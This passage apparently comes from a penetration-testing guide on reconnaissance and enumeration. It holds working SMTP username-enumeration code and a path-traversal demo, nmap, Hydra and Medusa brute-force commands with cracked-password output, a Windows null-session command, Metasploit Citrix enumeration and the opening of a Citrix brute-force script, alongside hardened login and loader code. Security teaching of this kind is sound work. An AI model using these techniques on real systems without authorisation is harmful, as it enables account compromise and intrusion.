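    with socket.create_connection((server, port), timeout=timeout) as s:
        s.sendall(query.encode("ascii") + b"\r\n")
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", errors="replace")


def offline_fetch(server, query):
    """Stand-in for whois_query that replays SAMPLE_ANSWERS."""
    return SAMPLE_ANSWERS[server]


def whois_lookup(query, start="whois.iana.org", max_hops=4, fetch=whois_query):
    """Follow referrals from IANA down to the authoritative registry or registrar.
    Returns (server_that_answered, parsed_records). Loops are cut by the seen set."""
    server, seen, records = start, set(), {}
    for _ in range(max_hops):
        records = parse_whois(fetch(server, query))
        nxt = referral_server(records)
        if not nxt or nxt == server or nxt in seen:
            return server, records
        seen.add(server)
        server = nxt
    return server, records


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "192.0.2.1"
    who, rec = whois_lookup(target, fetch=offline_fetch if len(sys.argv) < 2 else whois_query)
    print("answered by", who)
    for k in ("inetnum", "netname", "org", "organisation", "descr"):
        for v in rec.get(k, []):
            print("%-14s %s" % (k + ":", v))
```

Run it with an IP or domain as the only argument to query the real servers; with no argument it replays the constructed sample chain. Note that the hand-off rules differ per registry, which is why the referral keys are a list and not a single field.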
Google Hacking: What is Google hacking?
Finding Old Vulnerable Web Pages / Fast & Passive Web Crawling/Spidering
Finding Login Interfaces
Finding Exploitable Vulnerable Web Systems by Signature
Choosing a public exploit:
Finding a vulnerable website
Finding a vulnerable machine as the exploitation target can be done by using Google to find
websites containing a similar long path or directory tree:
Alternately, the vulnerable website can be found by using the “Powered by” signature of open
source projects:
Verifying the vulnerability exists
Exploiting the Vulnerability
Opening a free hosting account
Local File Inclusion Example:
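What the Local File Inclusion case above exploits is a file path built from a request parameter without a containment check. The following is an added Python example, not code from the book, that places the vulnerable template loader beside a hardened one and runs a traversal payload against both. The template directory, the "config.php" secret one level above it and the page names are all constructed for the demonstration.

```python
import os
import tempfile


def render_page_vulnerable(base_dir, page):
    """The classic LFI pattern: a request parameter is joined into a file path unchecked.
    '../' walks out of base_dir, and os.path.join drops base_dir entirely when page is absolute."""
    with open(os.path.join(base_dir, page)) as f:
        return f.read()


def render_page_hardened(base_dir, page):
    """Resolve symlinks and '..' first, then require the result to stay under base_dir.
    Appending a fixed extension also limits what can be included at all."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, page + ".tpl"))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError("page %r resolves outside the template directory" % page)
    with open(target) as f:
        return f.read()


def demo():
    """Build a throwaway template dir plus a constructed secret one level up, then try both loaders."""
    root = tempfile.mkdtemp()
    tpl = os.path.join(root, "templates")
    os.mkdir(tpl)
    with open(os.path.join(tpl, "home.tpl"), "w") as f:
        f.write("welcome")
    with open(os.path.join(root, "config.php"), "w") as f:  # constructed 'secret' outside the web root
        f.write("db_password=hunter2")
    out = {
        "vuln_normal": render_page_vulnerable(tpl, "home.tpl"),
        "vuln_traversal": render_page_vulnerable(tpl, "../config.php"),  # leaks the secret
        "hard_normal": render_page_hardened(tpl, "home"),
    }
    try:
        render_page_hardened(tpl, "../config")
        out["hard_traversal"] = "allowed"
    except PermissionError:
        out["hard_traversal"] = "blocked"
    return out


if __name__ == "__main__":
    for name, result in demo().items():
        print("%-15s %s" % (name, result))
```

The hardened loader checks the resolved path rather than the raw string, so encoded or nested "..", absolute paths and symlinks are all judged by where they actually land.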
Finding Cameras
Finding Password Files
Scanning: Definition
The term scanning refers to the phase of discovering the machines, protocols and ports that exist
in an accessible computer network. Port scanning is an art and a crucial part of the
reconnaissance process. Many junior information security personnel make mistakes during the
scanning process and fail to discover certain machines and services, which results in
vulnerabilities that are not found and therefore not repaired.
The common scanning concept relies on the idea that a certain service listens on a default port
number, so successfully connecting to that port makes it reasonable to assume that the expected
service is there. To positively identify the true service listening on a port, the scanner first waits
briefly for a greeting banner and then sends the "hello message" of each known protocol in its
database until it gets a response in that protocol (this is what Nmap's -sV/-A service detection does).
The most famous scanner is Nmap, which has been under development since 1997 and supports
practically every known port scanning method. The two most common port scanning methods are
the SYN scan and the Connect scan.
• Connect Scan: nmap -Pn --open -v -A -p1-65535 -sT <ip>
o Slower
o 100% reliable (if you can connect, then the port is publicly open)
o Allows interrogating the true underlying service
o Can be implemented in any programming language (even JavaScript), since it only needs the
operating system's connect() call
o Completes the TCP handshake, so the connection is seen by the application and its logs
• SYN Scan: nmap -Pn --open -v -A -p1-65535 -sS <ip>
o Fastest scanning method
o Sends a single SYN per port and never completes the handshake ("half-open")
o Requires raw packet access (root on Unix, the WinPcap driver on Windows)
o Might trigger a false alarm of a "SYN Flood" attack in firewalls/IDS/IPS
Enumeration Overview of System Hacking Cycle
Enumerating the allowed HTTP Methods on a Web Server:
Enumerating Usernames Using Google
Exposed Configuration Files
Company Email Addresses:
In most cases, a user’s email address is also his username inside the company, especially when
Single Sign-On (SSO) is implemented.
SMTP Enumeration (VRFY, EXPN, RCPT TO, NDR)
Using the SMTP VRFY Command
It is possible to enumerate the existing users and email aliases using the standard SMTP VRFY
command. The process can be automated with a simple script/tool such as pentestmonkey’s
“smtp-user-enum.pl”.
The output below shows how the SMTP server responds differently to VRFY requests for valid and
invalid users. It is recommended that a manual check like the following is carried out before running
smtp-user-enum. Obviously the tool won't work if the server doesn't respond differently to requests
for valid and invalid users.
$ telnet 10.0.0.1 25
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 myhost Hello [10.0.0.99], pleased to meet you
VRFY no_such
550 no_such... User unknown
VRFY root
250 Super-User <root@myhost>
To use smtp-user-enum to enumerate valid usernames using the VRFY command, first
prepare a list of usernames (users.txt) and run the tool as follows:
$ smtp-user-enum.pl -M VRFY -U users.txt -t 10.0.0.1
Starting smtp-user-enum v1.0 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... users.txt
Target count ............. 1
Username count ........... 47
Target TCP port .......... 25
Query timeout ............ 5 secs
Relay Server ............. Not used
######## Scan started at Sun Jan 21 18:01:50 2011 #########
root@10.0.0.1: Exists
bin@10.0.0.1: Exists
daemon@10.0.0.1: Exists
lp@10.0.0.1: Exists
adm@10.0.0.1: Exists
uucp@10.0.0.1: Exists
postmaster@10.0.0.1: Exists
nobody@10.0.0.1: Exists
ftp@10.0.0.1: Exists
######## Scan completed at Sun Jan 21 18:01:50 2011 #########
9 results.
47 queries in 1 seconds (47.0 queries / sec)
It's worth noting that postmaster is not actually a valid OS-level user account - it's a mail
alias.
Using the SMTP EXPN Command
The output below shows how the SMTP server responds differently to EXPN requests for
valid and invalid users.
$ telnet 10.0.0.1 25
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 myhost Hello [10.0.0.99], pleased to meet you
EXPN no_such
550 no_such... User unknown
EXPN root
250 Super-User <root@myhost>
To use smtp-user-enum to enumerate valid usernames using the EXPN command, prepare the
same list of usernames (users.txt) and run the tool as follows (unsurprisingly, we get
the same results as above):
$ smtp-user-enum.pl -M EXPN -U users.txt -t 10.0.0.1
Starting smtp-user-enum v1.0 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... EXPN
Worker Processes ......... 5
Usernames file ........... users.txt
Target count ............. 1
Username count ........... 47
Target TCP port .......... 25
Query timeout ............ 5 secs
Relay Server ............. Not used
######## Scan started at Sun Jan 21 18:01:50 2011 #########
root@10.0.0.1: Exists
bin@10.0.0.1: Exists
daemon@10.0.0.1: Exists
lp@10.0.0.1: Exists
adm@10.0.0.1: Exists
uucp@10.0.0.1: Exists
postmaster@10.0.0.1: Exists
nobody@10.0.0.1: Exists
ftp@10.0.0.1: Exists
######## Scan completed at Sun Jan 21 18:01:50 2011 #########
9 results.
47 queries in 1 seconds (47.0 queries / sec)
Using the SMTP RCPT TO Command
The output below shows how the SMTP server responds differently to RCPT TO requests
for valid and invalid users. This is often the most useful technique, as VRFY and EXPN
are frequently disabled to prevent username enumeration, while a server must still
answer RCPT TO in order to receive mail at all.
$ telnet 10.0.0.1 25
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 myhost Hello [10.0.0.99], pleased to meet you
MAIL FROM:root
250 root... Sender ok
RCPT TO: no_such
550 no_such... User unknown
RCPT TO:root
250 root... Recipient ok
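The three exchanges above (VRFY, EXPN and RCPT TO) as working client code, added here as an example; it is not part of the original text and not smtp-user-enum itself. So that it runs offline, the target is a constructed toy SMTP responder started in a thread on 127.0.0.1; its banner, its user list (FAKE_USERS) and its reply codes are assumptions modelled on the Sendmail transcripts, not a real server. The client performs the manual sanity check the text recommends before enumerating: it first sends an unknown name and only proceeds if the server answers with a hard 5xx rather than a name-independent 252 or 500/502.

```python
"""SMTP username enumeration over VRFY, EXPN and RCPT TO (added example)."""
import socket
import threading

# Constructed sample data: the accounts the toy server "knows".
FAKE_USERS = {"root", "bin", "daemon", "postmaster"}


def _serve_one(conn):
    """Just enough SMTP to answer HELO, MAIL, RCPT, VRFY, EXPN, RSET and QUIT."""
    with conn:
        rfile = conn.makefile("rb")
        conn.sendall(b"220 myhost ESMTP toy-server\r\n")
        for raw in rfile:
            verb, _, arg = raw.decode("ascii", "replace").strip().partition(" ")
            verb, arg = verb.upper(), arg.strip()
            if verb in ("HELO", "EHLO") and not arg:
                conn.sendall(b"501 HELO requires domain address\r\n")
            elif verb in ("HELO", "EHLO", "MAIL", "RSET"):
                conn.sendall(b"250 OK\r\n")
            elif verb in ("VRFY", "EXPN", "RCPT"):
                # "VRFY root", "EXPN root" or "RCPT TO:<root>" -> "root"
                user = arg.split(":", 1)[-1].strip().strip("<>").split("@")[0]
                if user in FAKE_USERS:
                    conn.sendall(b"250 <" + user.encode() + b"@myhost>\r\n")
                else:
                    conn.sendall(b"550 " + user.encode() + b"... User unknown\r\n")
            elif verb == "QUIT":
                conn.sendall(b"221 Bye\r\n")
                return
            else:
                conn.sendall(b"500 Command unrecognized\r\n")


def start_fake_smtp():
    """Start the toy server on an ephemeral loopback port; return (host, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def accept_loop():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=_serve_one, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()


class SmtpEnumerator:
    """One SMTP session; every probe is a single command, like smtp-user-enum."""

    def __init__(self, host, port=25, timeout=5.0):
        self.sock = socket.create_connection((host, port), timeout=timeout)
        self.rfile = self.sock.makefile("rb")
        self._reply()            # 220 banner
        self._cmd("HELO x")

    def _reply(self):
        """Read one reply, skipping '250-...' continuation lines."""
        while True:
            line = self.rfile.readline().decode("ascii", "replace").rstrip("\r\n")
            if len(line) < 4 or line[3] != "-":
                return line

    def _cmd(self, text):
        self.sock.sendall(text.encode("ascii") + b"\r\n")
        return self._reply()

    def probe(self, method, user):
        """Reply line for one candidate via VRFY, EXPN or RCPT (RCPT TO)."""
        if method == "RCPT":
            self._cmd("RSET")
            self._cmd("MAIL FROM:<probe@example.com>")
            return self._cmd("RCPT TO:<%s>" % user)
        return self._cmd("%s %s" % (method, user))

    def method_usable(self, method):
        """Manual check from the text: an unknown name must get a hard 5xx.
        252 ('cannot verify, will accept') or 500/502 ('not implemented/disabled')
        means the answer does not depend on the name, so nothing leaks."""
        code = self.probe(method, "zz-no-such-user-zz")[:3]
        return code.startswith("5") and code not in ("500", "501", "502", "503", "504")

    def enumerate(self, method, candidates):
        return [u for u in candidates if self.probe(method, u).startswith("250")]

    def close(self):
        try:
            self._cmd("QUIT")
        finally:
            self.sock.close()


def enumerate_users(host, port, method, candidates):
    """Open a session, confirm the method leaks, enumerate, close.
    Returns None when the server does not distinguish valid from invalid names."""
    session = SmtpEnumerator(host, port)
    try:
        if not session.method_usable(method):
            return None
        return session.enumerate(method, candidates)
    finally:
        session.close()


if __name__ == "__main__":
    host, port = start_fake_smtp()
    wordlist = ["root", "bin", "daemon", "lp", "postmaster", "nobody", "ftp"]
    for method in ("VRFY", "EXPN", "RCPT"):
        print(method, enumerate_users(host, port, method, wordlist))
```

Against a real server, replace start_fake_smtp() with the target's address and port 25; the RCPT path is the one to try first when VRFY and EXPN come back 252 or 502.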
Non Delivery Response (NDR)
Mail servers are friendly and attempt to provide users with the best service they can.
Therefore, when someone sends an email to a non-existing user, the mail server notifies
the sender that this user doesn’t exist, so the sender can correct the typing error or call that
person to get the new account name.
To enumerate usernames using NDRs, the attacker simply sends an email to each candidate account
on the target domain: if the account exists, no notification comes back; if it doesn’t exist, an
NDR email arrives saying that the account doesn’t exist. This works even when VRFY, EXPN and
RCPT TO have been locked down, because the check happens after the message has been accepted.
POP3 Enumeration
The Post Office Protocol (POP3) is used by users to read their emails. In order for a user
to get his mailbox contents, the server requires the user to authenticate in two sequential
steps. In the first step the user sends the keyword “USER” followed by a space and his
username. In the second step the user sends the keyword “PASS” followed by a space
and his password in clear-text.
Some POP3 servers were implemented in such a way that they reply with one error
message when the user exists and a different one when he doesn’t. Select a
random list of names and passwords, connect to the POP3 server with a telnet client of your
choice, and try to authenticate. Following is an example of a POP3 server listening on an
AS/400 machine:
Private User Directories
Apache User Enumeration
http://www.example.com/~<username>
When a remote user makes a request for a possible user's default home page, the
server returns one of three responses:
• In a case where username is a valid user account, and has been configured with a
homepage, the server responds with the user's homepage.
• When username exists on the system, but has not been assigned a homepage
document, the server returns the message "You don't have permission to access
/~username on this server."
• If the tested username does not exist as an account on the system, the Apache
server's response includes the message "The requested URL /~username was not
found on this server." or refers to the default error page configured for this error.
For example, when the user doesn’t exist, the server redirects to the website main page:
WordPress Authors Template User Enumeration Vulnerability
There are other places where you might be able to find some usernames. A good
example is WordPress author templates which allow you to extract usernames through
URLs with the following syntax: /wordpress/author/authorname/
i.e.:
http://www.target-domain.com/wordpress/author/admin/
http://www.target-domain.com/wordpress/author/root/
A case when the user doesn’t exist:
A case when the user exists:
FTP
CWD Username Enumeration Vulnerability (Example: Solaris in.ftpd)
The Sun Solaris operating system contains a built-in FTP server called “in.ftpd”. This FTP
server has a classic user enumeration vulnerability. When a user is logged on to the
server, even with anonymous access, he can issue the CWD (Change Working
Directory) command followed by a tilde and a username.
The server replies with one response if the user account exists and a different one if
it doesn’t. For example:
“CWD ~root”
FTP Server Authentication Delay Username Enumeration Vulnerability
(Example: ProFTPD)
A timing attack exists in ProFTPD that could assist a remote user in enumerating
usernames. Analysis of the response time during authentication gives an attacker an
indication as to whether or not the supplied username is valid.
The problem occurs due to differing execution paths when the daemon encounters a
valid, invalid or privileged username. A remote attacker can exploit this vulnerability to
determine which usernames are valid, privileged, or do not exist on the remote system.
When an authentication attempt is sent to the FTP server, it responds slowly if the
username exists and faster if it doesn’t, typically because the password is only checked
for accounts that exist.
Telnet
Telnet Server User Field Account Enumeration (Example: Cisco Aironet)
A flaw was discovered in the firmware of the Cisco Aironet AP1100 (firmware version 12.2). The
flaw allows a malicious remote user to discover which accounts are valid on the targeted
Cisco Aironet Access Point by submitting a user name at the login prompt.
If the account exists, the attacker is then prompted for the password.
If not, the server replies with the message “% Login invalid”, revealing that the account
doesn’t exist.
Web Server Pre-Login – HTTP Response based enumeration (Example:
Lotus Domino)
An issue was reported in Lotus Domino server (“Lotus Domino Username Enumeration
Vulnerability”), which could allow remote users to determine the validity of a
username existing on a host.
When a remote user submits a GET request for a possible user's account, the server
response assists the user in determining the validity of the username submitted. If the
submitted username is valid, the server replies with an HTTP 200 OK message and the
login screen.
Alternatively, when the submitted username is not valid (meaning that it does not exist
on the system), the server responds with a 404 File Not Found message. Because the
server responds differently depending on whether or not the username is valid, an
attacker can test and enumerate possible usernames.
Error Message User Enumeration:
Most systems developed in the last decade are web applications. Most of these applications
require a user login mechanism, which is usually developed by the companies themselves. As
secure development is not taught in universities in the common Computer Science and
Software Engineering degrees, most developers make the same common mistakes when
developing login mechanisms.
The most common mistake is the application replying with one error message when the user
account exists and a different one when it doesn’t. For example:
• System Registration Error Message User Enumeration
o Sorry, there is already an account registered with the same email address.
• System Login Error Message User Enumeration
o Authentication failure: entered username does not exist.
o Authentication failure: incorrect password entered.
• System “Forget Password” Error/Success Message User Enumeration
o Sorry, the email address entered does not exist.
o A new password has been sent to your email address.
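The login mistake listed above, and the timing variant described for ProFTPD, shown side by side with the corrected form. This is an added example and not any application's real code: the user store is a constructed in-memory dictionary, the hashing is PBKDF2 from the Python standard library, and the account names and passwords are invented. The hardened version returns one message for every failure and always computes a hash (against a dummy record when the name is unknown), so neither the text nor the response time tells the attacker whether the account exists.

```python
"""Username enumeration via login error messages and timing (added example)."""
import hashlib
import hmac
import os
import time

ITERATIONS = 100_000  # slow enough that the hash dominates the request time


def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def _record(password):
    salt = os.urandom(16)
    return {"salt": salt, "hash": _hash(password, salt)}


# Constructed sample accounts (assumption: invented names and passwords).
USERS = {"alice": _record("correct horse"), "bob": _record("hunter2")}

# Dummy record used for unknown names, so they cost exactly one hash as well.
_DUMMY = _record(os.urandom(16).hex())

GENERIC_FAILURE = "Authentication failure: invalid username or password."


def login_vulnerable(username, password):
    """The mistake from the list above: two different failure messages, and no
    hash computed at all for unknown names, so response time leaks the same bit."""
    rec = USERS.get(username)
    if rec is None:
        return False, "Authentication failure: entered username does not exist."
    if _hash(password, rec["salt"]) != rec["hash"]:
        return False, "Authentication failure: incorrect password entered."
    return True, "Welcome."


def login_hardened(username, password):
    """One message for every failure; the hash is always computed (against the
    dummy record when the name is unknown), so neither text nor timing depends
    on whether the account exists."""
    rec = USERS.get(username, _DUMMY)
    candidate = _hash(password, rec["salt"])
    # compare_digest is constant-time; the cheap membership test comes after
    # the expensive hash so the expensive step is always taken.
    ok = hmac.compare_digest(candidate, rec["hash"]) and username in USERS
    return (True, "Welcome.") if ok else (False, GENERIC_FAILURE)


def timing_gap(login, known="alice", unknown="mallory", rounds=3):
    """What a remote attacker measures: best-of-N response time for a known
    user with a wrong password, minus the same for an unknown user (seconds).
    A clearly positive gap is the ProFTPD-style oracle."""
    def cost(user):
        best = float("inf")
        for _ in range(rounds):
            t0 = time.perf_counter()
            login(user, "definitely-wrong")
            best = min(best, time.perf_counter() - t0)
        return best
    return cost(known) - cost(unknown)


if __name__ == "__main__":
    for fn in (login_vulnerable, login_hardened):
        print(fn.__name__, fn("mallory", "x")[1], "|", fn("alice", "x")[1],
              "| gap %.4fs" % timing_gap(fn))
```

The same two fixes apply to the registration and “forgot password” messages in the list: answer “if an account with this address exists, an email has been sent” in both cases, and keep the work done identical on both paths.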
NetBIOS User Enumeration
The LSA (Local Security Authority) service on every Windows machine handles user logon and
determines the access level each user gets to system objects when he connects to system
services such as RPC, WMI, Remote Desktop and NetBIOS.
On Windows Server 2003 and earlier versions, the “RestrictAnonymous” setting is, by default or
for backward compatibility, configured to allow unauthenticated users to retrieve information
regarding any/all local/domain users (RestrictAnonymous=0). This setting allows an attacker to
connect to the server with an empty username and password (a “null session”).
For example, using ‘cmd /c net use \\domain_server\IPC$ "" /user:""’, or the common
NetBIOS user enumeration tool written by SecurityFriday, “GetAcct”:
It is also possible to use the tool Winfingerprint to obtain information from all common
services exposed by a local server on the network:
McAfee Foundstone SuperScan 4:
NetBIOS Enumerator:
GFI LANguard:
SNMP Enumeration
It is possible to obtain system information about a remote host by sending SNMP requests
with a known “OID” (Object ID) such as 1.3.6.1.2.1.1.1 (sysDescr), usually by trying the default
community strings “public” and “private”. An attacker may use this information to gain more
knowledge about the target host.
An attacker is able to remotely discover the machine’s usernames, IPs connected to the machine,
MAC addresses, internal IPs, gateways and DNS servers (which can later be abused to
take over the internal network). The attacker also learns the exact model and firmware version
of the machine and can use it to create a reliable exploit.
An Example of a remote SNMP Enumeration:
DNS Enumeration
A penetration test project begins by collecting information and mapping all the remotely
accessible organization’s servers. The Domain Name System can be used to extract some
of the existing subdomains and discover more IPs, with different server types, from web
servers to firewalls, VPNs and Citrix servers.
The DNS sub-domains can be enumerated by using a dictionary of common sub-domain
names such as “mail”, “webmail”, “vpn”, “backoffice”, “fw” and so on.
In order to find customized sub-domain names, an attacker must run a full remote brute
force attack over letters and digits. Since DNS is UDP based, this brute force runs
faster than most other network brute force attacks, but the keyspace grows exponentially
with the label length, so only short names (a handful of characters) are realistically
exhaustible; longer custom names are better found with larger dictionaries.
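The dictionary approach above as code, added here as an example and not the page's own tool. The resolver is passed in as a function so the logic runs offline against the constructed zone below (FAKE_ZONE, with invented names and RFC 5737 documentation addresses); in the field, pass system_resolve instead. The check a practitioner wants before trusting any hit is included: a random label is resolved first, and if the zone has a wildcard record every dictionary word would “exist”, so answers matching the wildcard's address are discarded.

```python
"""Dictionary-based DNS sub-domain enumeration with wildcard detection
(added example)."""
import secrets
import socket

COMMON_WORDS = ["www", "mail", "webmail", "vpn", "backoffice", "fw", "ftp", "dev", "citrix"]

# Constructed sample zone; a "*.domain" key stands for a wildcard record.
FAKE_ZONE = {
    "www.example.test": "203.0.113.10",
    "mail.example.test": "203.0.113.20",
    "vpn.example.test": "203.0.113.30",
}


def make_fake_resolver(zone):
    """Return resolve(name) -> ip or None, honouring one level of wildcard."""
    def resolve(name):
        if name in zone:
            return zone[name]
        parent = name.partition(".")[2]
        return zone.get("*." + parent)
    return resolve


def system_resolve(name):
    """Real resolver for field use: first A record, or None on NXDOMAIN."""
    try:
        return socket.gethostbyname(name)
    except socket.gaierror:
        return None


def wildcard_answer(domain, resolve):
    """Probe a random label nobody would register. If it resolves, the zone
    has a wildcard record and every word in the dictionary would 'exist'."""
    return resolve("%s.%s" % (secrets.token_hex(8), domain))


def enumerate_subdomains(domain, wordlist, resolve):
    """{fqdn: ip} for dictionary words that resolve, minus wildcard answers."""
    wild_ip = wildcard_answer(domain, resolve)
    found = {}
    for word in wordlist:
        fqdn = "%s.%s" % (word, domain)
        ip = resolve(fqdn)
        # Heuristic: an answer equal to the wildcard's is treated as noise. A real
        # host that deliberately shares the wildcard address is lost this way;
        # comparing other record types (CNAME, MX) narrows that down.
        if ip is None or ip == wild_ip:
            continue
        found[fqdn] = ip
    return found


if __name__ == "__main__":
    print(enumerate_subdomains("example.test", COMMON_WORDS, make_fake_resolver(FAKE_ZONE)))
    wild_zone = {**FAKE_ZONE, "*.example.test": "198.51.100.1",
                 "ftp.example.test": "203.0.113.40"}
    print(enumerate_subdomains("example.test", COMMON_WORDS, make_fake_resolver(wild_zone)))
```

For a brute-force run, generate the labels instead of reading a wordlist and keep the wildcard check; it is what stops a wildcard zone from producing thousands of false hits.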
Dictionary Based DNS Enumeration
Brute Forcing DNS Sub-Domains
VoIP User Enumeration
Most currently deployed VoIP servers are using SIP (Session Initiation Protocol) server
implementations, which are very similar to HTTP. In order to authenticate using the SIP
protocol, the remote user must specify the extension name to log into. Then the user is
required to submit his username and password, where in most cases the extension
number is also the username.
Several VoIP systems start the first extension number from 100 and set the default
password of all extensions to the extension number. This means that for some VoIP
servers, the default usernames and passwords will be 100:100, 101:101 and so on.
Enumerating Extensions:
Enumerate Usernames: (Example: Inter Asterisk Exchange protocol)
Citrix Published Applications Remote Enumeration
It is possible to use several tools such as:
http://packetstormsecurity.org/defcon10/dc10-vitek/citrix-pa-scan.c
http://packetstormsecurity.org/defcon10/dc10-vitek/citrix-pa-proxy.pl
The Citrix Application Enumeration script can be used as follows:
# ./citrix-pa-scan 212.123.69.1
Citrix Published Application Scanner version 1.0 By Ian Vitek, ian.vitek@ixsecurity.com
212.123.69.1: Found Applications:
Printer Config
Admin Desktop
i-desktop
It is also possible to use Nmap or MetaSploit to enumerate the applications published by a Citrix
Server:
$ msfconsole
msf > use auxiliary/gather/citrix_published_bruteforce
msf auxiliary(citrix_published_bruteforce) > set RHOST [TARGET IP]
msf auxiliary(citrix_published_bruteforce) > run
Once found, an application can be manually added to the local ICA client:
System Hacking Part 1- Cracking Password
Brute Forcing Passwords – Telnet:
Cracking Accounts Using Hydra
Using the tool Hydra by THC (The Hacker’s Choice), it is possible to remotely and reliably crack
accounts of almost every commonly used system.
Hydra supports cracking accounts in all the following protocols: imap, imap-ntlm, smb smbnt,
http/https-{head|get|post|post-form}, http-proxy, cisco (telnet), cisco-enable (telnet), vnc,
ldap2, ldap3, mssql, mysql, oracle-listener, postgres, nntp, socks5, rexec, rlogin, pcnfs, snmp,
rsh, cvs, svn, icq, sapr3, ssh2, smtp-auth, smtp-auth-ntlm, pcanywhere, teamspeak, sip, vmauthd
hydra.exe -L "usernames.txt" -P "passwords.txt" -e ns -o cracked_smbs.txt
<any_domain_connected_machine> smb
Example:
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-11-07 17:16:06
[DATA] 1 tasks, 1 servers, 4652972 login tries (l: 11026/p: 422), ~4652972 tries per task
[DATA] attacking service smb on port 139
[STATUS] 8332.00 tries/min, 8332 tries in 00:01h, 4644640 to do in 09:18h
[STATUS] 7643.33 tries/min, 22930 tries in 00:03h, 4630042 to do in 10:06h
[STATUS] 7530.43 tries/min, 52713 tries in 00:07h, 4600259 to do in 10:11h
[139][smb] host: 10.205.200.206 login: PRAVNER password: 12345
[139][smb] host: 10.205.200.206 login: ZORIK password: 12345
[139][smb] host: 10.205.200.206 login: COHSIGAL password: 123456
[139][smb] host: 10.205.200.206 login: INADRIAN password: 123456
[139][smb] host: 10.205.200.206 login: Guest password: Guest
[139][smb] host: 10.205.200.206 login: MLSHOSHANA password: 12345
[139][smb] host: 10.205.200.206 login: MEETING_ROOM password: 12345
[STATUS] 7803.07 tries/min, 117046 tries in 00:15h, 4535926 to do in 09:42h
[139][smb] host: 10.205.200.206 login: SHIL password: 22222
[139][smb] host: 10.205.200.206 login: NTRFAX password: NTRFAX
[139][smb] host: 10.205.200.206 login: EZORLY password: 22222
[139][smb] host: 10.205.200.206 login: anonymous password: anonymous
[139][smb] host: 10.205.200.206 login: INFO password: 12345
[139][smb] host: 10.205.200.206 login: NTJERPDC password: NTJERPDC
[STATUS] 8046.32 tries/min, 249436 tries in 00:31h, 4403536 to do in 09:08h
[139][smb] host: 10.205.200.206 login: GRMINA password: 123456
[139][smb] host: 10.205.200.206 login: BRSHUKI password: 123456
[139][smb] host: 10.205.200.206 login: KZADINA password: 123456
[139][smb] host: 10.205.200.206 login: SPOFER password: 123456
[STATUS] 8254.85 tries/min, 387978 tries in 00:47h, 4264994 to do in 08:37h
[139][smb] host: 10.205.200.206 login: ALROZE password: 123456
[139][smb] host: 10.205.200.206 login: CHYULI password: 12345
Cracking Accounts Using Medusa:
Medusa is very much like Hydra; it supports the following protocols: AFP, CVS, FTP,
HTTP, IMAP, MS-SQL, MySQL, NetWare NCP, NNTP, PcAnywhere, POP3, PostgreSQL,
REXEC, RLOGIN, RSH, SMBNT, SMTP-AUTH, SMTP-VRFY, SNMP, SSHv2, Subversion (SVN),
Telnet, VMware Authentication Daemon (vmauthd), VNC, Generic Wrapper, Web Form
Here is an example of usage and results:
% medusa -h 192.168.0.20 -u administrator -P passwords.txt -e ns -M smbnt
Medusa v1.0-rc1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: (1/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: administrator (2/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: password (3/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass1 (4/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass2 (5/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass3 (6/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass4 (7/7)
Brute Forcing Check Point Client Authentication Remote Service
The Check Point web Client Authentication Remote Service is just a simple HTML based
authentication form, easily attacked with a common web brute force tool such as Hydra,
Medusa, Crowbar and so on.
The login page was displayed in the enumeration section. The result of a successful login
attempt with a default user on a Check Point firewall looks like this:
Brute Forcing Citrix ICA Servers
The hacker pdp from GNUCITIZEN.org wrote a Citrix brute force tool (I guess this was the first
public one and for now seems to be the only one) which uses the “Citrix.ICAClient” COM object to
drive the local Citrix client through the login attempts. The code is a local JavaScript (JScript)
script running under “Windows Script Host”.
var actns = [];
var pairs = [];
var parms = {};
var util = this;
var usernames = [];
var passwords = [];
var timeout = 5000;

if (WScript.Arguments.length < 3) {
    WScript.Echo('usage: ' + WScript.ScriptName + ' key=value key=value key=value ...');
    WScript.Echo('       ' + WScript.ScriptName + ' TCPBrowserAddress=172.16.3.191 usernames=user1,user2 passwords=pass1,pass2');
    WScript.Echo('       ' + WScript.ScriptName + ' HTTPBrowserAddress=172.16.3.191 userfile=file.txt passfile=file.txt');
    WScript.Echo('       ' + WScript.ScriptName + ' TCPBrowserAddress=172.16.3.191 usernames=user1,user2 passwords=pass1,pass2 timeout=5000');
    WScript.Echo('');
    WScript.Echo('CITRIX Login Bruteforce Utility');
